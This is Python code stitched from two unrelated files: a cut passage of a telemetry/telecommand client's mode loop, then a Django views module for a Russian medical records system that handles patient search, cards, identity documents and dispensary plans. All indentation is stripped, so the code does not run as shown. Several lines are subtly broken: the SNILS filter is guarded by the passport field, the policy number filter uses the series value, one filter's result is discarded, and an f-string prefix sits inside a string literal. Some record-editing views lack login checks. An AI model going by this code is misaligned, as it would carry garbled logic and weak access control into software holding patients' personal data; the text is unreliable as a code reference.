elif self.mode == CoreModeList.SEQUENTIAL_CMD_MODE:
service_queue = deque()
service_queue_packer = ServiceQueuePacker()
service_queue_packer.pack_service_queue_core(
service=self.__service,
service_queue=service_queue,
op_code=self.__op_code,
)
if not self.__com_if.valid:
return
LOGGER.info("Performing service command operation")
sender_and_receiver = SequentialCommandSenderReceiver(
com_if=self.__com_if,
tmtc_printer=self.__tmtc_printer,
tm_handler=self.__tm_handler,
tm_listener=self.__tm_listener,
tc_queue=service_queue,
apid=self.__apid,
)
sender_and_receiver.send_queue_tc_and_receive_tm_sequentially()
self.mode = CoreModeList.LISTENER_MODE
else:
try:
from tmtccmd.config.hook import get_global_hook_obj
hook_obj = get_global_hook_obj()
hook_obj.perform_mode_operation(mode=self.mode, tmtc_backend=self)
except ImportError as error:
print(error)
LOGGER.error("Custom mode handling module not provided!")
def __core_operation(self, one_shot):
if self.mode == CoreModeList.LISTENER_MODE:
one_shot = False
if not one_shot:
while True:
self.__handle_action()
if self.mode == CoreModeList.IDLE:
LOGGER.info("TMTC Client in idle mode")
time.sleep(5)
elif self.mode == CoreModeList.LISTENER_MODE:
time.sleep(1)
else:
self.__handle_action()
|
views.py
|
import datetime
import logging
import re
import threading
from typing import Optional, List
import pytz
import simplejson as json
from django.contrib.auth.decorators import login_required
from laboratory.decorators import group_required
from django.core.exceptions import ValidationError
from django.db import transaction, connections
from django.db.models import Prefetch, Q
from django.forms import model_to_dict
from django.http import JsonResponse
from api import sql_func
from appconf.manager import SettingManager
from clients.models import (
CardBase,
Individual,
Card,
Document,
DocumentType,
District,
AnamnesisHistory,
DispensaryReg,
CardDocUsage,
BenefitReg,
BenefitType,
VaccineReg,
Phones,
AmbulatoryData,
AmbulatoryDataHistory,
DispensaryRegPlans, ScreeningRegPlan,
)
from contracts.models import Company
from directions.models import Issledovaniya
from directory.models import Researches
from laboratory import settings
from laboratory.utils import strdate, start_end_year, localtime
from rmis_integration.client import Client
from slog.models import Log
from statistics_tickets.models import VisitPurpose
from tfoms.integration import match_enp, match_patient
from directory.models import DispensaryPlan
from utils.data_verification import data_parse
logger = logging.getLogger(__name__)
def full_patient_search_data(p, query):
dp = re.compile(r'^[0-9]{2}\.[0-9]{2}\.[0-9]{4}$')
split = str(re.sub(' +', ' ', str(query))).split()
n = p = ""
f = split[0]
rmis_req = {"surname": f + "%"}
if len(split) > 1:
n = split[1]
rmis_req["name"] = n + "%"
if len(split) > 2:
if re.search(dp, split[2]):
split = [split[0], split[1], '', split[2]]
else:
p = split[2]
rmis_req["patrName"] = p + "%"
if len(split) > 3:
if '.' in split[3]:
btday = split[3].split(".")
elif len(split[3]) == 8 and split[3].isdigit():
btday = [split[3][0:2], split[3][2:4], split[3][4:8]]
else:
btday = None
if btday:
btday = btday[2] + "-" + btday[1] + "-" + btday[0]
rmis_req["birthDate"] = btday
return f, n, p, rmis_req, split
@login_required
def patients_search_card(request):
objects = []
data = []
d = json.loads(request.body)
inc_rmis = d.get('inc_rmis')
always_phone_search = d.get('always_phone_search')
tfoms_module = SettingManager.l2('tfoms')
birthday_order = SettingManager.l2('birthday_order')
inc_tfoms = d.get('inc_tfoms') and tfoms_module
card_type = CardBase.objects.get(pk=d['type'])
query = d.get('query', '').strip()
suggests = d.get('suggests', False)
extended_search = d.get('extendedSearch', False)
limit = min(int(d.get('limit', 10)), 20)
form = d.get('form', {})
p = re.compile(r'^[а-яё]{3}[0-9]{8}$', re.IGNORECASE)
p2 = re.compile(r'^([А-яЁё\-]+)( ([А-яЁё\-]+)(( ([А-яЁё\-]*))?( ([0-9]{2}\.?[0-9]{2}\.?[0-9]{4}))?)?)?$')
p_tfoms = re.compile(r'^([А-яЁё\-]+) ([А-яЁё\-]+)( ([А-яЁё\-]+))? (([0-9]{2})\.?([0-9]{2})\.?([0-9]{4}))$')
p3 = re.compile(r'^[0-9]{1,15}$')
p_enp_re = re.compile(r'^[0-9]{16}$')
p_enp = bool(re.search(p_enp_re, query))
p4 = re.compile(r'card_pk:\d+(:(true|false))?', flags=re.IGNORECASE)
p4i = bool(re.search(p4, query.lower()))
p5 = re.compile(r'phone:.+')
p5i = bool(re.search(p5, query))
pat_bd = re.compile(r"\d{4}-\d{2}-\d{2}")
c = None
has_phone_search = False
inc_archive = form and form.get('archive', False)
if extended_search and form:
q = {}
family = str(form.get('family', ''))
if family:
q['family__istartswith'] = family
name = str(form.get('name', ''))
if name:
q['name__istartswith'] = name
patronymic = str(form.get('patronymic', ''))
if patronymic:
q['patronymic__istartswith'] = patronymic
birthday = str(form.get('birthday', ''))
if birthday:
birthday_parts = birthday.split('.')
if len(birthday_parts) == 3:
if birthday_parts[0].isdigit():
q['birthday__day'] = int(birthday_parts[0])
if birthday_parts[1].isdigit():
q['birthday__month'] = int(birthday_parts[1])
if birthday_parts[2].isdigit():
q['birthday__year'] = int(birthday_parts[2])
objects = Individual.objects.all()
if q:
objects = objects.filter(**q)
enp_s = str(form.get('enp_s', ''))
enp_n = str(form.get('enp_n', ''))
if enp_n:
if enp_s:
objects = objects.filter(document__serial=enp_s, document__number=enp_s, document__document_type__title='Полис ОМС')
else:
objects = objects.filter(document__number=enp_n, document__document_type__title='Полис ОМС')
pass_s = str(form.get('pass_s', ''))
pass_n = str(form.get('pass_n', ''))
if pass_n:
objects = objects.filter(document__serial=pass_s, document__number=pass_n, document__document_type__title='Паспорт гражданина РФ')
snils = str(form.get('snils', ''))
if pass_n:
objects = objects.filter(document__number=snils, document__document_type__title='СНИЛС')
medbook_number = str(form.get('medbookNumber', ''))
if medbook_number and SettingManager.l2('profcenter'):
objects = objects.filter(card__medbook_number=medbook_number)
phone = str(form.get('phone', ''))
if phone:
normalized_phones = Phones.normalize_to_search(phone)
if normalized_phones:
objects = objects.filter(
Q(card__phones__normalized_number__in=normalized_phones) |
Q(card__phones__number__in=normalized_phones) |
Q(card__phone__in=normalized_phones) |
Q(card__doctorcall__phone__in=normalized_phones)
)
elif p5i or (always_phone_search and len(query) == 11 and query.isdigit()):
has_phone_search = True
phone = query.replace('phone:', '')
normalized_phones = Phones.normalize_to_search(phone)
objects = list(Individual.objects.filter(
Q(card__phones__normalized_number__in=normalized_phones) |
Q(card__phones__number__in=normalized_phones) |
Q(card__phone__in=normalized_phones) |
Q(card__doctorcall__phone__in=normalized_phones)
))
elif p_enp:
if tfoms_module and not suggests:
from_tfoms = match_enp(query)
if from_tfoms and isinstance(from_tfoms, dict):
Individual.import_from_tfoms(from_tfoms)
objects = list(Individual.objects.filter(document__number=query, document__document_type__title='Полис ОМС'))
elif not p4i:
if inc_tfoms:
t_parts = re.search(p_tfoms, query.lower()).groups()
t_bd = "{}-{}-{}".format(t_parts[7], t_parts[6], t_parts[5])
from_tfoms = match_patient(t_parts[0], t_parts[1], t_parts[2], t_bd)
if isinstance(from_tfoms, list):
for t_row in from_tfoms:
if isinstance(t_row, dict):
Individual.import_from_tfoms(t_row, no_update=True)
if re.search(p, query.lower()):
initials = query[0:3].upper()
btday = query[7:11] + "-" + query[5:7] + "-" + query[3:5]
if not pat_bd.match(btday):
return JsonResponse([], safe=False)
try:
objects = list(
Individual.objects.filter(family__startswith=initials[0], name__startswith=initials[1], patronymic__startswith=initials[2], birthday=btday, card__base=card_type)
)
if ((card_type.is_rmis and len(objects) == 0) or (card_type.internal_type and inc_rmis)) and not suggests:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base({"surname": query[0] + "%", "name": query[1] + "%", "patrName": query[2] + "%", "birthDate": btday}, fio=True)
except Exception as e:
logger.exception(e)
elif re.search(p2, query):
f, n, p, rmis_req, split = full_patient_search_data(p, query)
if len(split) > 3 or (len(split) == 3 and split[-1].isdigit()):
sbd = split[-1]
if len(sbd) == 8:
sbd = "{}.{}.{}".format(sbd[0:2], sbd[2:4], sbd[4:8])
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, card__base=card_type, birthday=datetime.datetime.strptime(sbd, "%d.%m.%Y").date())
if len(split) > 3:
objects.filter(patronymic__istartswith=p)
objects = objects[:10]
else:
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p, card__base=card_type)[:10]
if ((card_type.is_rmis and (len(objects) == 0 or (len(split) < 4 and len(objects) < 10))) or (card_type.internal_type and inc_rmis)) and not suggests:
objects = list(objects)
try:
if not c:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base(rmis_req, fio=True, limit=10 - len(objects))
except Exception as e:
logger.exception(e)
if (
(re.search(p3, query) and not card_type.is_rmis)
or (len(objects) == 0 and len(query) == 16 and not p_enp and card_type.internal_type)
or (card_type.is_rmis and not re.search(p3, query))
):
resync = True
if len(objects) == 0:
resync = False
try:
objects = Individual.objects.filter(card__number=query.upper(), card__base=card_type)
if not inc_archive:
objects = objects.filter(card__is_archive=False)
objects = list(objects)
if (card_type.is_rmis or card_type.internal_type) and len(objects) == 0 and len(query) == 16 and not suggests:
if not c:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base(query)
elif not suggests:
resync = True
except Exception as e:
logger.exception(e)
if resync and card_type.is_rmis and not suggests:
if not c:
c = Client(modules="patients")
sema = threading.BoundedSemaphore(10)
threads = list()
def sync_i(ind_local: Individual, client: Client):
sema.acquire()
try:
ind_local.sync_with_rmis(c=client)
finally:
sema.release()
try:
connections.close_all()
logger.exception("Closed db connections")
except Exception as e:
logger.exception(f"Error closing connections {e}")
for obj in objects:
thread = threading.Thread(target=sync_i, args=(obj, c))
threads.append(thread)
thread.start()
if p4i:
parts = query.split(":")
cards = Card.objects.filter(pk=int(parts[1]))
inc_archive = inc_archive or (len(parts) > 2 and parts[2] == 'true')
else:
cards = Card.objects.filter(base=card_type, individual__in=objects)
if not has_phone_search and re.match(p3, query):
cards = cards.filter(number=query)
if p_enp and cards:
cards = cards.filter(carddocusage__document__number=query, carddocusage__document__document_type__title='Полис ОМС')
if cards:
medbook_number = str(form.get('medbookNumber', ''))
if medbook_number and SettingManager.l2('profcenter'):
cards = cards.filter(medbook_number=medbook_number)
d1, d2 = start_end_year()
if birthday_order:
cards = cards.order_by('-individual__birthday')
if not inc_archive:
cards = cards.filter(is_archive=False)
row: Card
for row in (
cards
.select_related("individual", "base")
.prefetch_related(
Prefetch(
'individual__document_set',
queryset=Document.objects.filter(is_active=True, document_type__title__in=['СНИЛС', 'Паспорт гражданина РФ', 'Полис ОМС'])
.distinct("pk", "number", "document_type", "serial")
.select_related('document_type')
.order_by('pk'),
),
'phones_set',
)
.distinct()[:limit]
):
disp_data = sql_func.dispensarization_research(row.individual.sex, row.individual.age_for_year(), row.pk, d1, d2)
status_disp = 'finished'
if not disp_data:
status_disp = 'notneed'
else:
for i in disp_data:
if not i[4]:
status_disp = 'need'
break
data.append(
{
"type_title": card_type.title,
"base_pk": row.base_id,
"num": row.number,
"is_rmis": row.base.is_rmis,
"family": row.individual.family,
"name": row.individual.name,
"twoname": row.individual.patronymic,
"birthday": row.individual.bd(),
"age": row.individual.age_s(),
"fio_age": row.individual.fio(full=True),
"sex": row.individual.sex,
"individual_pk": row.individual_id,
"isArchive": row.is_archive,
"pk": row.pk,
"phones": Phones.phones_to_normalized_list(row.phones_set.all(), row.phone),
"main_diagnosis": row.main_diagnosis,
"docs": [
*[
{
"pk": x.pk,
"type_title": x.document_type.title,
"document_type_id": x.document_type_id,
"serial": x.serial,
"number": x.number,
"is_active": x.is_active,
"date_start": x.date_start,
"date_end": x.date_end,
"who_give": x.who_give,
"from_rmis": x.from_rmis,
"rmis_uid": x.rmis_uid,
}
for x in row.individual.document_set.all()
],
*(
[
{
"pk": -10,
"type_title": "Номер мед.книжки",
"document_type_id": -10,
"serial": row.medbook_prefix,
"number": str(row.medbook_number),
"is_active": True,
"date_start": None,
"date_end": None,
"who_give": "",
"from_rmis": False,
"rmis_uid": None,
}
] if row.medbook_number else []
)
],
"medbookNumber": f"{row.medbook_prefix} {row.medbook_number}".strip(),
"status_disp": status_disp,
"disp_data": disp_data,
}
)
return JsonResponse({"results": data})
@login_required
def patients_search_individual(request):
objects = []
data = []
d = json.loads(request.body)
query = d['query'].strip()
p = re.compile(r'[а-яё]{3}[0-9]{8}', re.IGNORECASE)
p2 = re.compile(r'^([А-яЁё\-]+)( ([А-яЁё\-]+)(( ([А-яЁё\-]*))?( ([0-9]{2}\.[0-9]{2}\.[0-9]{4}))?)?)?$')
p4 = re.compile(r'individual_pk:\d+')
pat_bd = re.compile(r"\d{4}-\d{2}-\d{2}")
if re.search(p, query.lower()):
initials = query[0:3].upper()
btday = query[7:11] + "-" + query[5:7] + "-" + query[3:5]
if not pat_bd.match(btday):
return JsonResponse([], safe=False)
try:
objects = Individual.objects.filter(family__startswith=initials[0], name__startswith=initials[1], patronymic__startswith=initials[2], birthday=btday)
except ValidationError:
objects = []
elif re.search(p2, query):
f, n, p, rmis_req, split = full_patient_search_data(p, query)
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p)
if len(split) > 3:
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p, birthday=datetime.datetime.strptime(split[3], "%d.%m.%Y").date())
if re.search(p4, query):
objects = Individual.objects.filter(pk=int(query.split(":")[1]))
n = 0
if not isinstance(objects, list):
for row in objects.distinct().order_by("family", "name", "patronymic", "birthday"):
n += 1
data.append({"family": row.family, "name": row.name, "patronymic": row.patronymic, "birthday": row.bd(), "age": row.age_s(), "sex": row.sex, "pk": row.pk})
if n == 25:
break
return JsonResponse({"results": data})
def patients_search_l2_card(request):
data = []
request_data = json.loads(request.body)
cards = Card.objects.filter(pk=request_data.get('card_pk', -1))
if cards.exists():
card_orig = cards[0]
Card.add_l2_card(card_orig=card_orig)
l2_cards = Card.objects.filter(individual=card_orig.individual, base__internal_type=True)
for row in l2_cards.filter(is_archive=False):
docs = (
Document.objects.filter(individual__pk=row.individual_id, is_active=True, document_type__title__in=['СНИЛС', 'Паспорт гражданина РФ', 'Полис ОМС'])
.distinct("pk", "number", "document_type", "serial")
.order_by('pk')
)
data.append(
{
"type_title": row.base.title,
"num": row.number,
"is_rmis": row.base.is_rmis,
"family": row.individual.family,
"name": row.individual.name,
"twoname": row.individual.patronymic,
"birthday": row.individual.bd(),
"age": row.individual.age_s(),
"sex": row.individual.sex,
"individual_pk": row.individual_id,
"base_pk": row.base_id,
"pk": row.pk,
"phones": row.get_phones(),
"docs": [{**model_to_dict(x), "type_title": x.document_type.title} for x in docs],
"main_diagnosis": row.main_diagnosis,
}
)
return JsonResponse({"results": data})
@login_required
def patients_get_card_data(request, card_id):
card = Card.objects.get(pk=card_id)
c = model_to_dict(card)
i = model_to_dict(card.individual)
docs = [
{**model_to_dict(x), "type_title": x.document_type.title}
for x in Document.objects.filter(individual=card.individual).distinct('pk', "number", "document_type", "serial").order_by('pk')
]
rc = Card.objects.filter(base__is_rmis=True, individual=card.individual)
d = District.objects.all().order_by('-sort_weight', '-id')
return JsonResponse(
{
**i,
**c,
"docs": docs,
"main_docs": card.get_card_documents(),
"main_address_full": card.main_address_full,
"fact_address_full": card.fact_address_full,
"has_rmis_card": rc.exists(),
"av_companies": [{"id": -1, "title": "НЕ ВЫБРАНО", "short_title": ""}, *[model_to_dict(x) for x in Company.objects.filter(active_status=True).order_by('title')]],
"custom_workplace": card.work_place != "",
"work_place_db": card.work_place_db_id or -1,
"district": card.district_id or -1,
"districts": [{"id": -1, "title": "НЕ ВЫБРАН"}, *[{"id": x.pk, "title": x.title} for x in d.filter(is_ginekolog=False)]],
"ginekolog_district": card.ginekolog_district_id or -1,
"gin_districts": [{"id": -1, "title": "НЕ ВЫБРАН"}, *[{"id": x.pk, "title": x.title} for x in d.filter(is_ginekolog=True)]],
"agent_types": [{"key": x[0], "title": x[1]} for x in Card.AGENT_CHOICES if x[0]],
"excluded_types": Card.AGENT_CANT_SELECT,
"agent_need_doc": Card.AGENT_NEED_DOC,
"mother": None if not card.mother else card.mother.get_fio_w_card(),
"mother_pk": card.mother_id,
"father": None if not card.father else card.father.get_fio_w_card(),
"father_pk": card.father_id,
"curator": None if not card.curator else card.curator.get_fio_w_card(),
"curator_pk": card.curator_id,
"agent": None if not card.agent else card.agent.get_fio_w_card(),
"agent_pk": card.agent_id,
"payer": None if not card.payer else card.payer.get_fio_w_card(),
"payer_pk": card.payer_id,
"rmis_uid": rc[0].number if rc.exists() else None,
"doc_types": [{"pk": x.pk, "title": x.title} for x in DocumentType.objects.all()],
"number_poli": card.number_poliklinika,
"harmful": card.harmful_factor,
"medbookPrefix": card.medbook_prefix,
"medbookNumber": card.medbook_number,
"medbookNumberCustom": card.medbook_number if card.medbook_type == 'custom' else '',
"medbookNumberCustomOriginal": card.medbook_number if card.medbook_type == 'custom' else '',
"medbookType": card.medbook_type,
"medbookTypePrev": card.medbook_type,
"isArchive": card.is_archive,
}
)
@login_required
@group_required("Лечащий врач", "Врач-лаборант", "Оператор лечащего врача", "Оператор Контакт-центра")
def patients_card_save(request):
request_data = json.loads(request.body)
message = ""
messages = []
if "new_individual" in request_data and (request_data["new_individual"] or not Individual.objects.filter(pk=request_data["individual_pk"])) and request_data["card_pk"] < 0:
i = Individual(family=request_data["family"], name=request_data["name"], patronymic=request_data["patronymic"], birthday=request_data["birthday"], sex=request_data["sex"])
i.save()
else:
changed = False
i = Individual.objects.get(pk=request_data["individual_pk"] if request_data["card_pk"] < 0 else Card.objects.get(pk=request_data["card_pk"]).individual_id)
if (
i.family != request_data["family"]
or i.name != request_data["name"]
or i.patronymic != request_data["patronymic"]
or str(i.birthday) != request_data["birthday"]
or i.sex != request_data["sex"]
):
changed = True
i.family = request_data["family"]
i.name = request_data["name"]
i.patronymic = request_data["patronymic"]
i.birthday = datetime.datetime.strptime(request_data["birthday"], "%d.%m.%Y" if '.' in request_data["birthday"] else "%Y-%m-%d").date()
i.sex = request_data["sex"]
i.save()
if Card.objects.filter(individual=i, base__is_rmis=True).exists() and changed:
try:
c = Client(modules=["individuals", "patients"])
c.patients.send_patient(Card.objects.filter(individual=i, base__is_rmis=True)[0])
except:
messages.append("Синхронизация с РМИС не удалась")
individual_pk = i.pk
if request_data["card_pk"] < 0:
with transaction.atomic():
base = CardBase.objects.select_for_update().get(pk=request_data["base_pk"], internal_type=True)
c = Card(number=Card.next_l2_n(), base=base, individual=i, main_diagnosis="", main_address="", fact_address="")
c.save()
card_pk = c.pk
Log.log(card_pk, 30000, request.user.doctorprofile, request_data)
else:
card_pk = request_data["card_pk"]
c = Card.objects.get(pk=card_pk)
individual_pk = request_data["individual_pk"]
c.main_diagnosis = request_data["main_diagnosis"]
try:
vals = json.loads(request_data["main_address_full"])
c.main_address = vals['address']
c.main_address_fias = vals['fias']
c.main_address_details = vals['details']
except:
c.main_address = request_data["main_address"]
c.main_address_fias = None
c.main_address_details = None
try:
vals = json.loads(request_data["fact_address_full"])
c.fact_address = vals['address']
c.fact_address_fias = vals['fias']
c.fact_address_details = vals['details']
except:
c.fact_address = request_data["fact_address"]
c.fact_address_fias = None
c.fact_address_details = None
c.number_poliklinika = request_data.get("number_poli", "")
if request_data["custom_workplace"] or not Company.objects.filter(pk=request_data.get("work_place_db", -1)).exists():
c.work_place_db = None
c.work_place = request_data["work_place"] if request_data["custom_workplace"] else ''
else:
c.work_place_db = Company.objects.get(pk=request_data["work_place_db"])
c.work_place = ''
c.district_id = request_data["district"] if request_data["district"] != -1 else None
c.ginekolog_district_id = request_data["gin_district"] if request_data["gin_district"] != -1 else None
c.work_position = request_data["work_position"]
c.phone = request_data["phone"]
c.harmful_factor = request_data.get("harmful", "")
medbook_type = request_data.get("medbookType", "")
medbook_prefix = str(request_data.get("medbookPrefix", "")).strip()
medbook_number = str(request_data.get("medbookNumber", "-1"))
medbook_number_custom = str(request_data.get("medbookNumberCustom", "-1"))
medbook_number = medbook_number if medbook_type != 'custom' else medbook_number_custom
medbook_number_int = int(medbook_number) if medbook_number.isdigit() else None
if medbook_type == 'none' and c.medbook_type != 'none':
c.medbook_number = ''
c.medbook_type = medbook_type
else:
try:
with transaction.atomic():
base = CardBase.objects.select_for_update().get(pk=request_data["base_pk"], internal_type=True)
if medbook_type == 'custom' and medbook_number_int is not None and (c.medbook_number != medbook_number_int or c.medbook_prefix != medbook_prefix):
medbook_auto_start = SettingManager.get_medbook_auto_start()
if medbook_number_int <= 1 or medbook_auto_start <= medbook_number_int:
raise Exception("Некорректный номер мед.книжки")
if Card.objects.filter(medbook_number=medbook_number, base=base, medbook_prefix=medbook_prefix).exclude(pk=c.pk).exists():
raise Exception(f"Номер {medbook_prefix} {medbook_number} уже есть у другого пациента")
c.medbook_prefix = medbook_prefix
c.medbook_number = medbook_number_int
c.medbook_type = medbook_type
elif (c.medbook_type != 'auto' or c.medbook_number == '') and medbook_type == 'auto':
c.medbook_prefix = ''
c.medbook_number = Card.next_medbook_n()
c.medbook_type = medbook_type
except Exception as e:
messages.append(str(e))
c.save()
if c.individual.primary_for_rmis:
try:
c.individual.sync_with_rmis()
except:
messages.append("Синхронизация с РМИС не удалась")
result = "ok"
return JsonResponse({"result": result, "message": message, "messages": messages, "card_pk": card_pk, "individual_pk": individual_pk})
@login_required
@group_required("Управление иерархией истории")
def patients_card_archive(request):
request_data = json.loads(request.body)
pk = request_data['pk']
card = Card.objects.get(pk=pk)
card.is_archive = True
card.save()
return JsonResponse({"ok": True})
@login_required
@group_required("Управление иерархией истории")
def patients_card_unarchive(request):
request_data = json.loads(request.body)
pk = request_data['pk']
card = Card.objects.get(pk=pk)
if card.is_archive:
n = card.number
if Card.objects.filter(number=n, is_archive=False, base=card.base).exists():
return JsonResponse({"ok": False, "message": "fНомер {n} уже занят другой картой"})
card.is_archive = False
card.save()
return JsonResponse({"ok": True})
def individual_search(request):
result = []
request_data = json.loads(request.body)
tfoms_module = SettingManager.l2('tfoms')
family = request_data["family"]
name = request_data["name"]
patronymic = request_data["patronymic"]
birthday = request_data["birthday"]
forced_gender = []
if tfoms_module and family and name and birthday:
from_tfoms = match_patient(family, name, patronymic, birthday)
for row in from_tfoms:
Individual.import_from_tfoms(row, no_update=True)
forced_gender.append(row['gender'].lower())
for i in Individual.objects.filter(family=family, name=name, patronymic=patronymic, birthday=birthday):
result.append(
{
"pk": i.pk,
"fio": i.fio(full=True),
"docs": [
{**model_to_dict(x), "type_title": x.document_type.title}
for x in Document.objects.filter(individual=i, is_active=True).distinct("number", "document_type", "serial", "date_end", "date_start")
],
"l2_cards": [{"number": x.number, "pk": x.pk} for x in Card.objects.filter(individual=i, base__internal_type=True, is_archive=False)],
}
)
forced_gender.append(i.sex)
forced_gender = None if not forced_gender or forced_gender.count(forced_gender[0]) != len(forced_gender) else forced_gender[0]
return JsonResponse({"result": result, 'forced_gender': forced_gender})
def get_sex_by_param(request):
request_data = json.loads(request.body)
t = request_data.get("t")
v = request_data.get("v", "")
r = "м"
if t == "name":
p = Individual.objects.filter(name=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
if t == "family":
p = Individual.objects.filter(family=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
if t == "patronymic":
p = Individual.objects.filter(patronymic=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
return JsonResponse({"sex": r})
def edit_doc(request):
request_data = json.loads(request.body)
pk = request_data["pk"]
serial = request_data["serial"]
number = request_data["number"]
type_o = DocumentType.objects.get(pk=request_data["type"])
is_active = request_data["is_active"]
date_start = request_data["date_start"]
date_start = None if date_start == "" else date_start
date_end = request_data["date_end"]
date_end = None if date_end == "" else date_end
who_give = request_data["who_give"] or ""
if pk == -1:
card = Card.objects.get(pk=request_data["card_pk"])
d = Document(
document_type=type_o,
number=number,
serial=serial,
from_rmis=False,
date_start=date_start,
date_end=date_end,
who_give=who_give,
is_active=is_active,
individual=Individual.objects.get(pk=request_data["individual_pk"]),
)
d.save()
cdu = CardDocUsage.objects.filter(card=card, document__document_type=type_o)
if not cdu.exists():
CardDocUsage(card=card, document=d).save()
else:
for c in cdu:
c.document = d
c.save(update_fields=["document"])
Log.log(d.pk, 30002, request.user.doctorprofile, request_data)
else:
for d in Document.objects.filter(pk=pk, from_rmis=False):
d.number = number
d.serial = serial
d.is_active = is_active
d.date_start = date_start
d.date_end = date_end
d.who_give = who_give
d.save()
Log.log(pk, 30002, request.user.doctorprofile, request_data)
d = Document.objects.get(pk=pk)
try:
d.sync_rmis()
except Exception as e:
print('RMIS error', e) # noqa: T001
return JsonResponse({"ok": True})
def update_cdu(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
doc = Document.objects.get(pk=request_data["doc"])
cdu = CardDocUsage.objects.filter(card=card, document__document_type=doc.document_type)
if not cdu.exists():
CardDocUsage(card=card, document=doc).save()
else:
for c in cdu:
c.document = doc
c.save(update_fields=["document"])
Log.log(card.pk, 30004, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def sync_rmis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
card.individual.sync_with_rmis()
return JsonResponse({"ok": True})
def sync_tfoms(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
is_new, updated = card.individual.sync_with_tfoms()
return JsonResponse({"ok": True, "is_new": is_new, "updated": updated})
def update_wia(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
key = request_data["key"]
if key in [x[0] for x in Card.AGENT_CHOICES]:
card.who_is_agent = key
card.save()
Log.log(card.pk, 30006, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def edit_agent(request):
request_data = json.loads(request.body)
key = request_data["key"]
card = None if not request_data["card_pk"] else Card.objects.get(pk=request_data["card_pk"])
parent_card = Card.objects.filter(pk=request_data["parent_card_pk"])
doc = request_data["doc"] or ''
clear = request_data["clear"]
need_doc = key in Card.AGENT_NEED_DOC
upd = {}
if clear or not card:
upd[key] = None
if need_doc:
upd[key + "_doc_auth"] = ''
if parent_card[0].who_is_agent == key:
upd["who_is_agent"] = ''
else:
upd[key] = card
if need_doc:
upd[key + "_doc_auth"] = doc
if key not in Card.AGENT_CANT_SELECT:
upd["who_is_agent"] = key
for card in parent_card:
for k, v in upd.items():
setattr(card, k, v)
card.save(update_fields=list(upd.keys()))
Log.log(request_data["parent_card_pk"], 30005, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def load_dreg(request):
request_data = json.loads(request.body)
data = []
diagnoses = set()
for a in DispensaryReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date_start', 'pk'):
data.append(
{
"pk": a.pk,
"diagnos": a.diagnos,
"illnes": a.illnes,
"spec_reg": '' if not a.spec_reg else a.spec_reg.title,
"doc_start_reg": '' if not a.doc_start_reg else a.doc_start_reg.get_fio(),
"doc_start_reg_id": a.doc_start_reg_id,
"date_start": '' if not a.date_start else strdate(a.date_start),
"doc_end_reg": '' if not a.doc_end_reg else a.doc_end_reg.get_fio(),
"doc_end_reg_id": a.doc_end_reg_id,
"date_end": '' if not a.date_end else strdate(a.date_end),
"why_stop": a.why_stop,
}
)
if not a.date_end:
diagnoses.add(a.diagnos)
researches = []
specialities = []
researches_data = []
specialities_data = []
card = Card.objects.get(pk=request_data["card_pk"])
visits = VisitPurpose.objects.filter(title__icontains="диспансерн")
year = request_data.get('year', '2020')
for d in sorted(diagnoses):
need = DispensaryPlan.objects.filter(diagnos=d)
for i in need:
if i.research:
if i.research not in researches:
researches.append(i.research)
results = research_last_result_every_month([i.research], card, year)
plans = get_dispensary_reg_plans(card, i.research, None, year)
researches_data.append(
{
"type": "research",
"research_title": i.research.title,
"research_pk": i.research.pk,
"assign_research_pk": i.research.pk,
"assignment": False,
"diagnoses_time": [],
"results": results,
"plans": plans,
"max_time": 1,
"times": len([x for x in results if x]),
}
)
index_res = researches.index(i.research)
researches_data[index_res]['diagnoses_time'].append({"diagnos": i.diagnos, "times": i.repeat})
if i.speciality:
if i.speciality not in specialities:
specialities.append(i.speciality)
results = research_last_result_every_month(Researches.objects.filter(speciality=i.speciality), request_data["card_pk"], year, visits)
plans = get_dispensary_reg_plans(card, None, i.speciality, year)
spec_assign_research = Researches.objects.filter(speciality=i.speciality).first()
specialities_data.append(
{
"type": "speciality",
"research_title": i.speciality.title,
"research_pk": i.speciality.pk,
"assign_research_pk": spec_assign_research.pk if spec_assign_research else None,
"assignment": False,
"diagnoses_time": [],
"results": results,
"plans": plans,
"max_time": 1,
"times": len([x for x in results if x]),
}
)
index_spec = specialities.index(i.speciality)
specialities_data[index_spec]['diagnoses_time'].append({"diagnos": i.diagnos, "times": i.repeat})
researches_data.extend(specialities_data)
return JsonResponse({"rows": data, "researches_data": researches_data, "year": year})
def load_screening(request):
card_pk: int = data_parse(request.body, {'cardPk': int})[0]
screening = ScreeningRegPlan.get_screening_data(card_pk)
return JsonResponse({"data": screening})
def research_last_result_every_month(researches: List[Researches], card: Card, year: str, visits: Optional[List[VisitPurpose]] = None):
results = []
filter = {
"napravleniye__client": card,
"research__in": researches,
"time_confirmation__year": year,
}
if visits:
filter['purpose__in'] = visits
for i in range(12):
i += 1
iss: Optional[Issledovaniya] = Issledovaniya.objects.filter(**filter, time_confirmation__month=str(i)).order_by("-time_confirmation").first()
if iss:
date = str(localtime(iss.time_confirmation).day).rjust(2, '0')
results.append({"pk": iss.napravleniye_id, "date": date})
else:
results.append(None)
return results
def get_dispensary_reg_plans(card, research, speciality, year):
plan = [''] * 12
disp_plan = DispensaryRegPlans.objects.filter(card=card, research=research, speciality=speciality, date__year=year)
for d in disp_plan:
if d.date:
plan[d.date.month - 1] = str(d.date.day).rjust(2, '0')
return plan
def update_dispensary_reg_plans(request):
request_data = json.loads(request.body)
